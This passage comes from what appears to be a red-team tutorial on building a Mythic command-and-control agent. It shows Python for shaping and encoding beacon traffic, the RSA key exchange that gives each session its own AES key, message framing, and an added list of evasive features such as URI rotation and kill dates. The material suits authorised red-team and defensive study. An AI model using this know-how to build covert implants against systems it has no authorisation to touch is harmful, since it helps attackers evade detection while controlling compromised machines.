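            data = base64.urlsafe_b64encode(data)
        elif action == "prepend":
            data = value + data
        elif action == "append":
            data = data + value
    return data


def reverse(data: bytes, transforms: list) -> bytes:
    """Undo transforms in reverse order, as the receiver does."""
    for t in reversed(transforms):
        action, value = t["action"], t.get("value", "").encode("utf-8")
        if action == "xor":
            data = xor(data, value)
        elif action == "base64url":
            data = base64.urlsafe_b64decode(data)
        elif action == "prepend":
            data = data[len(value):]
        elif action == "append":
            data = data[:len(data) - len(value)]
    return data


# Hypothetical chain: XOR, URL-safe base64, then wrap in a prefix and suffix.
chain = [
    {"action": "xor", "value": "examplekey"},
    {"action": "base64url", "value": ""},
    {"action": "prepend", "value": "sid="},
    {"action": "append", "value": ";v=1"},
]

wire = base64.b64encode(b"hypothetical agent message")
shaped = apply(wire, chain)
restored = reverse(shaped, chain)
print(shaped)
print(restored == wire)
```

A round trip that does not restore the original bytes usually points at transform order: the receiver must undo the last transform first.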

Encrypted Key Exchange

Our implementation uses RSA-based EKE per the Mythic checkin docs. When the operator selects aes256_hmac with encrypted_exchange_check = true, the agent performs a two-phase startup instead of a direct checkin:

Phase 1 — do_staging_rsa() (uses static AESPSK, outer UUID = PayloadUUID):

Agent → Mythic:
  Base64( PayloadUUID + AES256(AESPSK,
    {"action":"staging_rsa", "pub_key":"<b64 RSA PEM>", "session_id":"<20char>"}) )

Mythic → Agent:
  Base64( PayloadUUID + AES256(AESPSK,
    {"action":"staging_rsa", "uuid":"<tempUUID>",
     "session_key":"<RSAPub(new_32_byte_aes_key)>",
     "session_id":"<same 20char>"}) )

The agent decrypts session_key with its RSA private key (PKCS1_OAEP, SHA1, 4096-bit) to get the negotiated AES session key. This is stored as SESSION_KEY.

Phase 2 — do_checkin() (uses SESSION_KEY, outer UUID = tempUUID):

Agent → Mythic:
  Base64( tempUUID + AES256(SESSION_KEY, {checkin_data}) )

Mythic → Agent:
  Base64( tempUUID + AES256(SESSION_KEY,
    {"action":"checkin", "id":"<callbackUUID>", "status":"success"}) )

All subsequent get_tasking and post_response messages use CALLBACK_UUID + SESSION_KEY. The static AESPSK embedded in the binary is only used during the staging exchange — an attacker who extracts the binary can only decrypt the staging messages, not the session traffic.

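When the operator selects aes256_hmac with encrypted_exchange_check = false, the agent skips staging and checks in directly with PAYLOAD_UUID, using the static AESPSK for all traffic. When the operator selects none, the agent falls through to a plaintext checkin directly with PAYLOAD_UUID: no EKE, no encryption.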
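Every message in the exchanges above shares the same outer framing: a 36-character UUID followed by the body, all base64-encoded. The sketch below shows that framing for the plaintext case so that it needs only the standard library. The wrap and unwrap helper names are invented here, and in the encrypted modes the body would be the AES-256 blob instead of raw JSON.

```python
import base64
import json
import uuid

UUID_LEN = 36  # length of a UUID in canonical string form


def wrap(uuid_str: str, body: bytes) -> bytes:
    """Build Base64(UUID + body), the outer message format."""
    return base64.b64encode(uuid_str.encode("utf-8") + body)


def unwrap(wire: bytes) -> tuple:
    """Split a message back into (outer UUID, body)."""
    raw = base64.b64decode(wire)
    return raw[:UUID_LEN].decode("utf-8"), raw[UUID_LEN:]


# A random UUID stands in for PAYLOAD_UUID, tempUUID, or CALLBACK_UUID.
example_uuid = str(uuid.uuid4())
body = json.dumps({"action": "get_tasking", "tasking_size": -1}).encode("utf-8")

wire = wrap(example_uuid, body)
outer, inner = unwrap(wire)
print(outer == example_uuid, json.loads(inner))
```

The fixed 36-byte prefix is why send_message slices the response with unwrapped[36:] before decrypting.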


10. Summary of Changes: Part 1 → Part 2

| | Part 1 (http) | Part 2 (httpx) |
| --- | --- | --- |
| Profile | http | httpx only |
| Transport (lab) | HTTP plaintext | HTTP plaintext (TLS optional) |
| Key exchange | None (plaintext) | RSA EKE → per-session AES-256 key negotiated at runtime |
| Message encryption | None | AES-256-CBC + HMAC-SHA256 using negotiated session key |
| mythic_encrypts | False | True |
| Static key in binary | N/A | AESPSK used only for staging exchange, not session traffic |
| Tasks per beacon | 1 | All pending (tasking_size: -1) |
| Response round trips | Separate post_response | Piggybacked on next get_tasking |
| Request shaping | Fixed POST body | Profile-driven: URI, location, transforms from config file |
| URI rotation | Single URI | Random selection from uris array per request |
| Kill date | Not implemented | Checked before each beacon |
